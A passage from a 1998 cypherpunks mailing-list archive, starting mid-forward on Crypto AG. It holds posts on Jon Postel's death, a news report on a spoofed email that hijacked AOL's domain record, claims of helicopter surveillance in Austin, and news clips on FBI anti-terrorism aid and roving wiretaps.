> with a Swiss cryptography company, Crypto AG.  Crypto AG also at one time
> provided most of the encryption equipment used at the diplomatic level
> around the world.  What's special about this is, the agreement allowed the
> NSA to embed key-recovery devices inside products sold to other countries.
> The NSA could read the information transmitted with these products as easily
> as reading the newspaper.  This was an ongoing process until March 1992,
> when Iranian counterintelligence agents arrested a marketing representative
> from Crypto AG on suspicion of spying.  The battle for privacy continues.
===================END FORWARDED MESSAGE===================


Jean-Francois Avon, B.Sc. Physics, Montreal, Canada
  DePompadour, Socit d'Importation Lte
     Limoges fine porcelain and french crystal
  JFA Technologies, R&D physicists & engineers
     Instrumentation & control, LabView programming
PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 18 Oct 1998 01:53:21 +0800
To: cypherpunks@cyberpass.net
Subject: Jon Postel
Message-ID: <v04020a06b24e78b94af7@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date: Sat, 17 Oct 1998 11:32:10 -0400
Reply-To: wb8foz@nrk.com
Originator: com-priv@lists.psi.com
Sender: com-priv@lists.psi.com
Precedence: bulk
From: David Lesher <wb8foz@nrk.com>
To: Multiple recipients of list <com-priv@lists.psi.com>
Subject: Jon Postel
X-Comment:  Commercialization and Privatization of the Internet

died last night....

You might want to read Vin Cerf's thoughts on David Farber's
Interesting people list......

--
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 18 Oct 1998 02:30:11 +0800
To: cypherpunks@cyberpass.net
Subject: Now *this* is funny...
Message-ID: <v04020a07b24e7a179d1b@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-Sender: believer@telepath.com
Date: Sat, 17 Oct 1998 11:06:07 -0500
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: Fake Message Sends AOL E-Mail Astray
Mime-Version: 1.0
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: believer@telepath.com

Source:  Washington Post
http://www.washingtonpost.com/wp-srv/washtech/wtech001.htm

Fake Message Sends AOL E-Mail Astray

By Leslie Walker
Washington Post Staff Writer
Friday, October 16, 1998

A fake e-mail sent to the keeper of the Internet's global address book
yesterday erased America Online Inc.'s spot on the global computer
network, causing thousands of incoming e-mails to go to the wrong place
and preventing many people from visiting AOL's World Wide Web site.

AOL officials said all the misdirected e-mail should show up eventually in
the correct mailboxes. But the incident highlighted a security issue
involving how the central addresses known as domains are administered
on the Internet.

The incident began before 5 a.m. when someone impersonating an AOL
official sent e-mail to InterNIC, the Herndon organization that maintains
the domain name registry for the Internet, InterNIC spokesman
Christopher Clough said. The message requested the electronic address of
AOL's domain be changed.

Because AOL had chosen the lowest of three security levels possible for
making such a change, it was made automatically, with no review by any
person at Network Solutions Inc., the company that runs InterNIC,
Clough said.

The new address assigned was that of Autonet.net, an Internet service
provider. Mail meant for AOL automatically was diverted to Autonet,
overwhelming computers at the service.

In AOL's network monitoring center in Dulles, people monitoring traffic
volumes noticed a drop in the volume of e-mail coming in from the
Internet. They began investigating and found the change, AOL
spokeswoman Ann Brackbill said.

AOL rented a computer to lend to Autonet.net yesterday to reroute the
e-mail back to AOL while company officials simultaneously working with
InterNIC to correct AOL's address, Brackbill said.

AOL's actual Internet domain - AOL.com - was not changed, but the
directions the Internet uses in sending Web surfers there were changed
because of the fraudulent e-mail, so they couldn't get to the site. Instead,
error messages appeared on their screens.

"It's like if the phone book published the wrong address for AAA, and
you went there to get a map," Brackbill said. "You wouldn't be able to get
anything."

Clough said the e-mail came as a form message that was accepted
automatically because it appeared to come from the correct person and
address at AOL.com that was authorized to change AOL's InterNIC
records. Computer buffs call an incident of this kind "a spoof" - an
impersonation of someone by e-mail.

By 4:30 p.m., AOL's address had been corrected in the main Internet
address book, but it often takes hours for changes to travel throughout the
global network, Clough said.

AOL officials estimated that 12 percent to 15 percent of its e-mail was
affected Only about half of AOL's e-mail traffic comes from the Internet;
the other half is internal. In addition, 10 percent to 20 percent of the
people trying to access its Web site received error messages.

AOL officials asked InterNIC yesterday to change the security level for its
domain name records. The two higher levels available - and apparently
used by most commercial Internet operations - involve either a password
or encryption in the request for a change to the address.

Brackbill couldn't explain why AOL chose the lowest security level,
except to note that the record was created "a long time ago."

"We've never had a problem before with this and our goal is to make sure
we don't have it again," she said. AOL is cooperating with law
enforcement officials to identify the culprit.

 (c) Copyright The Washington Post Company
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sun, 18 Oct 1998 02:26:13 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Jon Postel (fwd)
Message-ID: <199810171758.MAA01943@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 17 Oct 1998 12:39:35 -0400
> From: Robert Hettinga <rah@shipwright.com>
> Subject: Jon Postel

> You might want to read Vin Cerf's thoughts on David Farber's
> Interesting people list......

Pray tell how?...


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marcel Popescu" <mdpopescu@geocities.com>
Date: Sat, 17 Oct 1998 19:00:24 +0800
To: <cypherpunks@toad.com>
Subject: Off-Topic
Message-ID: <001101bdf9c0$906950a0$020101df@sorexim.ro>
MIME-Version: 1.0
Content-Type: text/plain



Sorry for the off-topic, but does anybody know of a list related to
militias, gun-control and the like?

Thanks,
Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Sun, 18 Oct 1998 06:23:09 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Jon Postel
Message-ID: <36291493.3C7CC0D8@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



Hettinga:
>> You might want to read Vin[t] Cerf's thoughts on David Farber's
>> Interesting people list......
Choate:
> Pray tell how?...

----------forwarded from Dave Farber's IP list------------

Date: Sat, 17 Oct 1998 07:28:40 -0400
From: Dave Farber <farber@cis.upenn.edu>
Subject: IP: Remembrance/postel

I, and others I fear, have spent a sleepless night after hearing of the death
of Jon Postel last night. This morning there was a  note in my mail box from
Vint Cerf that said many of the things I feel at this time. I asked him for
permission to send on which he granted.

I also remember Jon. I was his primary thesis advisor along with Jerry Estrin
and I remember with fond memories the months spent closely working with Jon
while his eager mind developed the ideas in back of what was a pioneering
thesis that founded the area of protocol verification.  Since I was at UC
Irvine and Jon at UCLA we used to meet in the morning prior to my ride to UCI
at a Pancake House in Santa Monica for breakfast and the hard work of
developing a thesis. I gained a great respect for Jon then and 10 pounds of
weight.

I will miss him greatly. Jon was my second Ph.D. student. The first, Philip
Merlin, also died way before his time.

Dave

________________________________________________________________________

 October 17, 1998

I REMEMBER IANA

Vint Cerf

A long time ago, in a network, far far away, a great adventure took place?

Out of the chaos of new ideas for communication, the experiments, the
tentative designs, and crucible of testing, there emerged a cornucopia of
networks. Beginning with the ARPANET, an endless stream of networks evolved,
and ultimately were interlinked to become the Internet. Someone had to keep
track of all the protocols, the identifiers, networks and addresses and
ultimately the names of all the things in the networked universe. And someone
had to keep track of all the information that erupted with volcanic force from
the intensity of the debates and discussions and endless invention that has
continued unabated for 30 years. That someone was Jonathan B. Postel, our
Internet Assigned Numbers Authority, friend, engineer, confidant, leader,
icon, and now, first of the giants to depart from our midst.

Jon, our beloved IANA, is gone. Even as I write these words I cannot quite
grasp this stark fact. We had almost lost him once before in 1991. Surely we
knew he was at risk as are we all. But he had been our rock, the foundation on
which our every web search and email was built, always there to mediate the
random dispute, to remind us when our documentation did not do justice to its
subject, to make difficult decisions with apparent ease, and to consult when
careful consideration was needed. We will survive our loss and we will
remember. He has left a monumental legacy for all Internauts to contemplate.
Steadfast service for decades, moving when others seemed paralyzed, always
finding the right course in a complex minefield of technical and sometimes
political obstacles.

Jon and I went to the same high school, Van Nuys High, in the San Fernando
Valley north of Los Angeles. But we were in different classes and I really
didn?t know him then. Our real meeting came at UCLA when we became a part of a
group of graduate students working for Prof. Leonard Kleinrock on the ARPANET
project. Steve Crocker was another of the Van Nuys crowd who was part of the
team and led the development of the first host-host protocols for the ARPANET.
When Steve invented the idea of the Request for Comments series, Jon became
the instant editor. When we needed to keep track of all the hosts and protocol
identifiers, Jon volunteered to be the Numbers Czar and later the IANA once
the Internet was in place. 

Jon was a founding member of the Internet Architecture Board and served
continuously from its founding to the present. He was the FIRST individual
member of the Internet Society I know, because he and Steve Wolff raced to see
who could fill out the application forms and make payment first and Jon won.
He served as a trustee of the Internet Society. He was the custodian of the
.US domain, a founder of the Los Nettos Internet service, and, by the way,
managed the networking research division of USC Information Sciences
Institute.

Jon loved the outdoors. I know he used to enjoy backpacking in the high
Sierras around Yosemite. Bearded and sandaled, Jon was our resident
hippie-patriarch at UCLA. He was a private person but fully capable of
engaging photon torpedoes and going to battle stations in a good engineering
argument. And he could be stubborn beyond all expectation. He could have
outwaited the Sphinx in a staring contest, I think.

Jon inspired loyalty and steadfast devotion among his friends and his
colleagues. For me, he personified the words ?selfless service.? For nearly 30
years, Jon has served us all, taken little in return, indeed sometimes
receiving abuse when he should have received our deepest appreciation. It was
particularly gratifying at the last Internet Society meeting in Geneva to see
Jon receive the Silver Medal of the International Telecommunications Union. It
is an award generally reserved for Heads of State but I can think of no one
more deserving of global recognition for his contributions. 

While it seems almost impossible to avoid feeling an enormous sense of loss,
as if a yawning gap in our networked universe had opened up and swallowed our
friend, I must tell you that I am comforted as I contemplate what Jon has
wrought. He leaves a legacy of edited documents that tell our collective
Internet story, including not only the technical but also the poetic and
whimsical as well. He completed the incorporation of a successor to his
service as IANA and leaves a lasting legacy of service to the community in
that role. His memory is rich and vibrant and will not fade from our
collective consciousness. ?What would Jon have done?? we will think, as we
wrestle in the days ahead with the problems Jon kept so well tamed for so many
years. 

There will almost surely be many memorials to Jon?s monumental service to the
Internet Community. As current chairman of the Internet Society, I pledge to
establish an award in Jon?s name to recognize long-standing service to the
community, the Jonathan B. Postel Service Award, which is awarded to Jon
posthumously as its first recipient.

If Jon were here, I am sure he would urge us not to mourn his passing but to
celebrate his life and his contributions. He would remind us that there is
still much work to be done and that we now have the responsibility and the
opportunity to do our part. I doubt that anyone could possibly duplicate his
record, but it stands as a measure of one man?s astonishing contribution to a
community he knew and loved.

----------end of forward from Dave Farber's IP list----------

-- 
	Jim Gillogly
	Hevensday, 26 Winterfilth S.R. 1998, 22:01
	12.19.5.10.19, 10 Cauac 12 Yax, Third Lord of Night




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jan Dobrucki <jdobruck@kki.net.pl>
Date: Sat, 17 Oct 1998 22:57:13 +0800
To: cypherpunks@toad.com
Subject: Re: "Annihilating less-than-useful contributors" (fwd)
In-Reply-To: <199810170132.UAA00278@einstein.ssz.com>
Message-ID: <3628B55C.C805239B@kki.net.pl>
MIME-Version: 1.0
Content-Type: text/plain



"Annihilating less-than-useful contributors"... WOW... :-() when I
first read this I though that someone was going to kick me of this
list... ;-) Then I read the article and I relaxed a little...

JD

--
Wyslano za posrednictwem bezplatnego serwera KKI
Krakowski Komercyjny Internet - http://www.kki.net.pl

To jest miejsce na reklame Twojej firmy!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 18 Oct 1998 08:53:18 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ATTN: Does Any Listee Have Eye-Witness Report???
Message-ID: <199810180033.RAA27214@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: ATTN: Does Any Listee Have Eye-Witness Report???
Date: Fri, 16 Oct 1998 17:04:45 -0500
To: ignition-point@majordomo.pobox.com

---------------------
NOTE:  This is an anecdotal report, UNCONFIRMED at the present time.  If
anyone on the list is an eyewitness to this event, please report in ASAP
with additional details.  Thank you! -- Michele
---------------------

Forwarded:
---------------------

>Date: Fri, 16 Oct 1998 09:57:00 -0500
>From: "Shonda P. Wigington" <texnat57@gateway.net>
>Subject: FOR IMMEDIATE RELEASE: Helicopter Harassment
>
>
>>Freedom-Lovers International
>>Shonda P. Wigington, President
>>5308 Robinsdale Lane
>>Austin, Texas  78723
>>512-933-1950
>>
>>   OCTOBER 13, 1998--AUSTIN, TEXAS--On October 10, 1998, around noon, a
>>yellow and black helicopter flew around a South Austin neighborhood where
>>Alex Jones' mother lives.  Carol Jones reported that she did not pay
>>attention initially, but that it stayed in the area for about an hour.  She
>>observed the helicopter hovering over her property.  She said that the
>>words "Travis County" were printed on the side of the helicopter and that
>>the helicopter looked new. Someone was leaning out of the door of the
>>helicopter which she said was low enough for her to see that there was a
>>big lense camera pointed at her.
>>   When she returned into her home, she called her husband, Dr. David
>>Jones, who then called the Austin Aviation Department where he left a
>>message.  Simeon Tolgol returned the elder Mr. Jones' call the next
>>morning, explaining that the Travis County Sheriff's Department had logged
>>a four hour surveillance mission.  
>>   Around 2:00 AM that night, Alex Jones' girlfriend called Steve Lane of
>>"The Freedom Report" because of a helicopter shining spotlights into her
>>windows.  He stated to the Commissioners during Citizens Communication on
>>October 13, that the helicopter was so low that he could hear the noise
>>through the phone as he spoke to her.  She was frightened and crying.
>>   Jones' producer, Mike Hanson got film footage of the helicopter as it
>>moved over his home, shined the spotlight, turned it off, passed over, came
>>back, shined the light again several times. 
>>   "I was spotlighted by the helicopter very early saturday morning," Lane
>>said, "I believe it was about 1:30 to 2:00 am saturday morning. (The)
>>helicopter flew over, again, well under 800 feet above ground level, in
>>direct violation of the Federal Aviation Regulations, did not have a
>>spotlight on until it came to the house that I was at. The spotlight was
>>turned on, I have a video of it, and I'll be glad to give ya'll copies
>>because I would like for ya'll to look into this..."  Lane described the
>>incident as "unnerving".
>>   Mike Hanson called all of the County Commissioners for information
>>regarding the incident.  All of the Commissioners returned his call, that
>>is all accept Judge Bill Aleshire.
>>   Karen Sunleitner (Precinct 2 Commissioner) stated, "It was not the
>>Travis County Sheriff's office, it was the Austin Police Department.  The
>>Austin Police Department was piggy-backing on an existing flight that was
>>going on that particular day during the hours that Mr. Jones talked
>>about...were undergoing pilot training for the brand new helicopter.  They
>>piggy-backed on that.  They are doing ariel video footage of several
>>locations pertinent to ongoing homicide investigations."
>>   Several months ago Travis County Commissioners voted to buy the
>>helicopters at taxpayer expense, supposedly for Starflight assistance
>>during emergency situations.  But these particular helicopters were also
>>equipped with infrared "FLARE" technology that could easily be used for
>>surveillance.  
>>   The Texas Media Alliance was concerned that this technology could be
>>abused.  The different organizations that make up the Alliance voiced their
>>concerns to the commissioners, who adamently denied any such agenda for the
>>new helicopters.
>>   "They spoke to me like a child," Rusty Fields of Common Sense said, "and
>>they assured me that they would not use the helicopters for surveillance."
>>He looked around and gestured at the number of people in the room and said,
>>"This is what happens when they get caught lying."
>>   Alex Jones informed the commissioners that day that he was "conducting
>>an investigation."
>>He claims the county conducted a surveillance mission last week, denying
>>the county commissioners' claim that it was done by the city. 
>>   "You are all a pack of liars!" Jones stated, "Pure harassment. It's
>>SABER 1. You see, they passed it (the bill) under Starflight so everybody
>>can laugh and call it Starflight." Starflight being the term to use for
>>emergency pick-up missions by the local EMS.
>>Jones said he obtained the I-D of the people doing it through the Aviation
>>logues.
>>   "Flying over Alex's mothers house, I'm not buying that it was a homicide
>>investigation," said Mike Runyan, who had been there when the county
>>commissioners assured him by likening the use of the new helicopters to
>>"searching for lost children in the greenbelts."  Runyan commented that he
>>was not real happy about the video footage of the incident over Hanson's
>>house. 
>>   "Ya'll keep doing it," he warned, "and you're libel to provoke somebody.
>> It's just the natural progression of things."
>>   Mike Hanson played a tape-recorded interview of Mrs. Jones by Alex Jones
>>on his radio show, "The Real Spin," heard on KJFK 98.9FM (Austin).
>>   "I really still didn't know, or become paranoid or anything," she said,
>>"but these people made about eight passes over my place, maybe more, but
>>let's just say conservatively eight."
>>She stated that they were passing and "taking pictures."
>>   "I don't know what is more disturbing, that they would do this because,
>>like, I'm your mother," she told her son during the interview, "or that
>>they would just do it to somebody who's just sitting there, because this
>>person either has film of me or got really good pictures of just someone
>>looking straight up at him."
>>   "Are there any federal funds involved in these helicopters?" asked John
>>P. Roberts, when it came his turn to speak.
>>   "No, sir," Sunleitner stated.
>>   "There are no federal funds?" Roberts asked again, "So technically you
>>are not tied to them in any way if they want to come and 'borrow' them for
>>any reason?"
>>   "That is purchased by the taxpayers of Travis County," Sunleitner
>>assured him.
>>   Roberts closed his remarks with, "Common sense tells you you don't
>>harass the people that pay you."
>>   "The people will be informed," stated Shonda P. Wigington of
>>Freedom-Lovers International, "and if it (the harassment) doesn't stop, we
>>WILL strive for a class-action lawsuit against Travis County."
>>   During Citizens Communication that day, Darwin Mckees (Commissioner of
>>Precint 1) called in the Sheriff's Department as a result of a sit-in
>>attempt made by Free Press International's Greg Ericson in protest to the
>>three minute limit forced upon the people who came to speak that day.
>>Ericson left before the deputies arrived, and other than the Commissioners
>>trying to quieten Alex Jones's exclamations of what "liars" they are, there
>>were no other incidents.
>>  


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 18 Oct 1998 08:53:30 +0800
To: cypherpunks@cyberpass.net
Subject: IP: One-Stop Shopping for Anti-Terrorism Aid
Message-ID: <199810180033.RAA27225@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: One-Stop Shopping for Anti-Terrorism Aid
Date: Fri, 16 Oct 1998 17:55:09 -0500
To: believer@telepath.com

Source:  Fox News - AP

Reno offers one-stop federal anti-terrorist aid
 3.37 p.m. ET (1938 GMT) October 16, 1998

 By Michael J. Sniffen, Associated Press

 WASHINGTON (AP) - Attorney General Janet Reno trumpeted a new FBI office
Friday that will offer local police, fire and rescue workers one-stop
shopping for federal training and equipment to respond to chemical,
biological or nuclear attacks by terrorists. 

 The FBI's new National Domestic Preparedness Office, staffed by officials
from a variety of federal agencies, "will assume overall responsibility for
coordinating the government's efforts to prepare America's communities for
terrorist incidents involving weapons of mass destruction,'' Reno told her
weekly news conference. 

 After an attack, "the first few minutes are very critical,'' Reno said.
Usually, the first to arrive at the chaotic and dangerous scene are local
rescue squads, firefighters and police. "For many victims, what these first
responders do in those first few minutes can mean the difference between
life and death.'' 

 State and local officials responsible for these efforts have complained in
recent years that federal aid - either training or equipment - is hard to
find and inadequate and that some federal agencies duplicate the work of
others while gaps remain. 

 The new program "is trying to address the issues that first responders
have raised and create a two-way street so that we hear from them, that we
provide one central place where they can go, knowing that they will get the
best information, both from the FBI, Department of Defense, the Department
of Energy, the Public Health Service, and that they will get the latest
information with respect to equipment,'' Reno said. 

 Under a new interagency agreement, Justice and the FBI will take over from
the Defense Department as the coordinator, funded by $49 million from the
Pentagon in the coming fiscal year. 

 The program will train state and local workers, distribute money to buy
equipment, set up joint federal-state-local practice exercises and work
with state and local officials to draft contingency plans unique to each
local situation, Reno said. "State and local governments (will be) a full
partner in the planning effort, since they know what they need there at the
front line.'' 

 The FBI has been investigating a rising number of suspected biological,
chemical or nuclear-radiological incidents - 68 in 1997 and 86 in 1998. But
Bob Blitzer, chief of the FBI's domestic terrorism unit, said, "the vast
majority of these are hoaxes.'' 

 He said the bureau believed it had averted four or five potential attacks
in the last couple years. 

 Many fire department have good hazardous materials units to deal with
chemical attacks, and for many years there has been "a pretty robust
capability to handle'' nuclear-radiological attacks, Blitzer said. 

 "The real weakness that we have right now is the ability to detect and
counter a (biological attack), because it's much more insidious and much
more difficult to detect,'' Blitzer added. "There's certainly less
protection, particularly on the medical side.'' 

                  (c) 1998 Associated Press. All rights reserved.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 18 Oct 1998 08:52:28 +0800
To: cypherpunks@cyberpass.net
Subject: IP: FBI Says Some U.S. Cities Vulnerable To Attack
Message-ID: <199810180033.RAA27236@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: FBI Says Some U.S. Cities Vulnerable To Attack
Date: Fri, 16 Oct 1998 17:56:32 -0500
To: believer@telepath.com

Source:  Fox News - Reuters

FBI Says Some U.S. Cities Vulnerable To Attack
            2.13 p.m. ET (1814 GMT) October 16, 1998

 WASHINGTON - Some U.S. cities are unprepared for an attack by weapons of
mass destruction with biological agents a greater danger than nuclear or
chemical weapons, an FBI official said Friday. 

 "Some American communities are very unprepared. They certainly don't have
the equipment and resources necessary to handle a major attack,'' Robert
Blitzer, chief of the FBI's domestic terrorism section, said. 

 "The real weakness that we have right now is the ability to detect and
counter a (biological weapons attack) because it's much more insidious and
much more difficult to detect,'' he said. 

 The FBI official, who was unable to give numbers on how many cities were
unprepared, said communities were better able to deal with chemical and
nuclear weapons attacks. 

 Many fire departments have units that deal with hazardous materials and
are ready to handle chemical weapons, he said. 

 "On the nuclear side, there's a pretty robust capability to handle those
kinds of issues and has been for many years,'' Blitzer said. 

 He appeared at the weekly Justice Department news conference with U.S.
Attorney General Janet Reno, who announced a new office at the FBI to help
state and local governments better respond to terrorist attacks with
weapons of mass destruction. 

 Reno said the office would help create training standards for local
police, firefighters and rescue squads and would try to make sure they have
the necessary equipment. 

 "I want this new office to be a center for assistance and solutions, not a
new bureaucracy,'' she said. "We are not interested in a top-down,
one-size-fits-all solution.'' 

                     (c) Reuters Ltd. All rights reserved
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 18 Oct 1998 08:53:22 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 5.49: More on The FBI's New Wiretap Authority
Message-ID: <199810180033.RAA27246@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ama-gi ISPI" <offshore@email.msn.com>
Subject: IP: ISPI Clips 5.49: More on The FBI's New Wiretap Authority
Date: Sat, 17 Oct 1998 00:01:14 -0700
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 5.49: More on The FBI's New Wiretap Authority
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Saturday October 17, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: ABC News.com, October 13, 1998
http://www.abcnews.com

Taps For Privacy?
Investigators Can Follow Suspects From Phone To Phone
http://www.abcnews.com/sections/tech/DailyNews/wirelaw981013.html

By
Chris Stamper
ABCNEWS.com

Buried deep inside the Intelligence Authorization Act of 1999 is a
provision that will change the way the FBI and other law enforcement
agencies can listen to suspects' phone calls. The new rule opens the doors
for more "roving" wiretaps, which listen to all the phones a suspect uses
rather than just a single line.

     Supporters say this will help the cops keep up with cell-phone
wielding crooks. Critics contend that it opens the door for ever more
invasions of privacy.

    The bill passed the House and Senate last week; President Clinton is
expected to sign it soon. A similar change was voted down in 1996 as part
of an anti-terrorism measure.


An Invitation to Abuse?

To bug a suspect, investigators must first obtain a court order. Current
federal wiretapping law allows multiple taps only if law enforcement can
convince a judge that a suspect is trying to avoid being overheard. The new
bill, introduced by Rep. Porter Goss (R-Fla.), requires only that
investigators show probable cause that "the person's actions could have the
effect of thwarting interception."

    Supporters maintain that such a change is necessary to keep up with
exploding technology. Suspects whose lines are tapped can easily switch to
a pay phone or cell phone and avoid detection.

    But Leslie Hagin, legislative director of the National Association of
Criminal Defense Lawyers, echoes the sentiments of many criminal defense
attorneys and civil libertarians who feel that the expansion of powers is
an invitation to abuse: "It's not a power the government needs."

    Defense attorneys such as Gregory Nicolaysen, founder of the
Association of Federal Defense Attorneys, complain that too many judges
rubber-stamp wiretapping requests and that the new law will only make that
situation worse: "The assumption is that those who are being wiretapped are
criminals anyway."

    "It's not being confined to drug dealers and organized crime,"
Nicolaysen argues. "It tends to be a knee-jerk reaction instead of an
investigative tool of last resort."


The Phones Have Ears

According to the Administrative Office of the United States Courts, federal
and state judges approved 1,186 wiretap applications in 1997 and 1,094 bugs
were planted. No requests were denied last year. Judges have rejected only
28 of over 20,000 applications since wiretapping was legalized in 1968.
Authorities arrested 3,086 people in 1997 with the help of phone taps,
which are typically placed in homes.

     The American Civil Liberties Union says that for every wiretap placed,
nearly a thousand innocent conversations are intercepted by law
enforcement. According to ACLU legislative counsel Greg Nojeim, the new
bill will mean that the phones of a suspect's friends, family and business
colleagues can all be tapped by law enforcement: "It means more wiretaps,
more lines tapped and additional thousands of intercepted innocent
conversations."

     The FBI says snoops have to ignore conversations that aren't relevant
to their investigations. "Under existing wiretap statutes," says special
agent Barry Smith, "law enforcement is only authorized to listen to those
conversations that are related to criminal activity."

     Nojeim argues that since roving wiretaps will be easier to obtain,
citizens' Fourth Amendment rights protecting against illegal searches will
erode. "When the government wants to search a place, it has to specify the
place it wants to search," he says. "Now for electronic surveillance the
specificity requirement is done away with."

    Smith says a hefty increase in roving wiretaps is unlikely, since such
an operation requires a team of surveillance experts who must coordinate
their efforts with several different phone companies: "It's still a
technological and logistical nightmare."

     Whether one believes that the new bill represents an invasion of
privacy, it seems clear that crooks won't be able to escape to their cell
phones much longer without fear of being overheard.

Copyright (c)1998 ABCNEWS

--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(up to 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you value in the ISPI Clips service or if
you are concerned about the erosion of your privacy in general, won't
you please help us continue this important work by becoming an "ISPI
Clips Supporter" or by taking out an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Clips Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
